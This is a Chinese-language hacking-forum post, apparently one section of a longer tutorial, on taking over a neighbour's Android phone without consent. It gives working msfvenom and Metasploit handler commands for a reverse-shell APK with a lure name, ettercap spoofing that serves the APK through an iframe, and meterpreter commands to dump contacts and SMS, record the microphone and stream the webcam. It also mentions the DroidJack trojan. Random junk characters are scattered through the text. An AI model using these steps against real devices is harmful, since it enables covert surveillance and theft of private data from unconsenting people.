- l8 E; e5 A* ]' S8 i 五、msf+ettercap入侵邻居安卓手机
/ W4 k7 p5 @$ K9 v9 ^9 N首先启动msf 7 X1 U3 b- ]- q! @
& w) P& F* o$ f w( r% P, e 先用kali生成一个安卓木马,如下命令:
8 H' [" U2 j0 l) @Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk
为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻
然后进入msf 6 i, e/ m/ e* H) e3 I9 W3 F* q
use exploit/multi/handler / z% h" D; V' W
set payload android/meterpreter/reverse_tcp
9 q H/ z6 q$ I9 r4 f% T$ u set LHOST 192.168.0.109 //ip为kaili的ip + j3 w% y" N- b" |+ n
- k; j" M4 F* w$ J$ H' x, ^+ F1 I, Z* B set LPORT 44444 //端口一定要与前面生成的木马的端口一致 , `& y3 ~9 g$ u
' p, B1 p2 ?6 RExploit : ~9 y' M' V" j0 Q: q K9 q/ @
( t- R5 \# T, z& J! A% W
下面我们开启ettercap -G , T; t: d. M5 Y. T8 p) D( H
$ ?: p: S4 m1 Q C; E+ ?: u; V) } 我物理IP为 # T8 E) C! ~/ o% f3 W4 G/ o3 Z6 W5 ^
) ]& ^% x" U" `* C
; ]( Q6 G2 I# z5 O3 R
! c. m1 w* \8 A. k/ m/ p 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的,
下面我们来设置一下 ; Y" Z: q/ h) ~: Z) S$ ^
' ]! m, o ]$ @; O6 a
$ u* ?4 d- F3 R5 w0 r" Q" p
在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, 1 \ W% B" p0 s, H
1 E' A0 ~, o: a8 E4 X0 g7 a& { ; k" |1 U1 R8 r. O S9 r7 C1 y
" {/ v' n* O. U# O
* P& M2 V% m! R) g) } & C+ W! E3 J# T. x
: } i" \- W4 w7 g& @/ v/ z2 @; {3 ?* w4 r: k2 O% @. ?4 U
& ^# N- U7 @$ Q4 j 0 o4 G, x* i: c( |- c
8 D8 z5 j7 y( N" W9 }
1 z0 x/ f/ j% m8 _7 R7 W
. u0 T- P4 Y1 c' z / _" W/ x m- I4 I# v
. e. H- @& A$ a( L9 U. a' W3 F4 [ c: z & t* R' G! y4 U+ u
$ u9 f4 |' _4 B9 V; Y/ B8 [; }6 g! r/ ?. e + w6 J3 p8 M7 i" n' s
* U. D. f' [3 p$ a9 r% d ; F7 {* [+ Z; r- s4 d; X# G! W! O
) O/ Z3 D- {; a q1 w
- \1 @8 Q8 l# C/ H; A2 W
' w H d; q5 c6 t6 V 下面我们开始攻击
# E8 c9 j4 [* `9 H( C/ }2 ~2 K( g" t( K; @
?8 }0 T/ ?0 h0 v/ Z" i
3 q/ ]; v- D( p: W- Z- ^" E! X& Q! P- h% z9 t
. k( e; x3 W, P
3 z5 W5 e" R: A5 `/ ~! Z3 y- G# q* f! Z" `. z# | c
, v: y/ A3 f$ G
1 M/ `- c. {$ B6 L 大概过了5分钟多,发现反弹成功了 / U6 ?# ^. W* [/ m6 i) \$ D
, ]' ~4 f/ N4 L% ] 8 o0 L% O9 l1 z1 Z$ e
7 L7 \9 X* _+ X) r5 w0 s % N; m* }' K: N1 {, X ]
" A0 h& ?. Z% `: q9 {2 C" ^% k5 H# {7 \! k5 U8 s
$ E$ ] F* ]8 I4 F 9 d1 ?. ?1 Y8 x; \6 u- k2 E- ^
9 S) g8 `# b' P0 c) o9 x3 q - R3 V* N9 b5 _ B) d' M* W% x
: |0 e6 h3 r% C/ _, P) f/ ?9 ? $ @. F6 ?, M6 u9 a( I* [ \: P
9 \% i" b% V6 X+ ~! _8 [
* f1 {5 o6 @+ m8 H& `) C* l
执行命令
$ e. B1 i/ ^, H5 g$ w0 p! m6 p o/ |" i- A! Q( B& K& _* R* E & [' D6 j- {: i# ?1 p% Z; s
& j' l- V- h* m0 ?3 I e# k' [ p: h" ? dump_contacts --》这个是导出电话
0 \4 t8 r4 F! g8 ?5 V3 j1 `dump_sms --》这个是导出信息 & s( e/ i& |" d3 L" p3 W
- D1 M. s4 U, E5 w7 d: D3 {7 z" D record_mic Record audio from the default microphone for X seconds $ R8 o# b. T/ l$ y/ R# q
2 g0 g% k$ I; g- }& |& twebcam_chat Start a video chat 2 \8 W- h4 H# P" @5 f
! k# _/ D; P: J; O$ o0 ~s2 g2 P, h5 N. d9 ]; N! G webcam_list List webcams . \8 t: a3 L8 U
2 r4 ?% e3 O- w# b* I3 W4 e webcam_snap Take a snapshot from the specified webcam
1 U& t; v9 k ^/ Q: N
webcam_stream  
lay a video stream from the specified webcam
* r! Y: h) n$ _1 J: r
! V- A5 \1 w p: {0 l* i b 我们打开看一下电话薄,
" z7 j' J) m( c ]* `$ M
8 H: R0 ^: x4 b) z) \( ?* g
$ l9 Q; K+ m" T& ]* s; d
3 {& b7 Q9 `3 Z
9 H0 X# \" p4 j6 D! j( C- K
) u6 X0 f; f# M8 k& S
! o8 b* S9 e8 T# a3 H. z$ X
: V( Y, T5 |6 x, e我们同时欺骗成DroidJack木马,使用方法如图:
9 F! S2 _3 E0 ]; q+ s" v* T* X$ T
. ~4 r: y, \% w
& ^6 X+ p( E3 R* D! z
切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口
1 E0 h* n$ {) J3 |3 V) t, I8 i: p; v: X$ y/ O
5 f0 V8 [# I8 k0 y+ Z
/ ~' V& V3 b9 T# r2 H! ?. ^4 L
" n- Y8 z7 K0 i6 X) {

( j1 `1 o" v0 w* L [/ @
2 G6 g y/ W0 e! z+ x4 P3 \7 R
| 欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) | Powered by Discuz! X3.2 |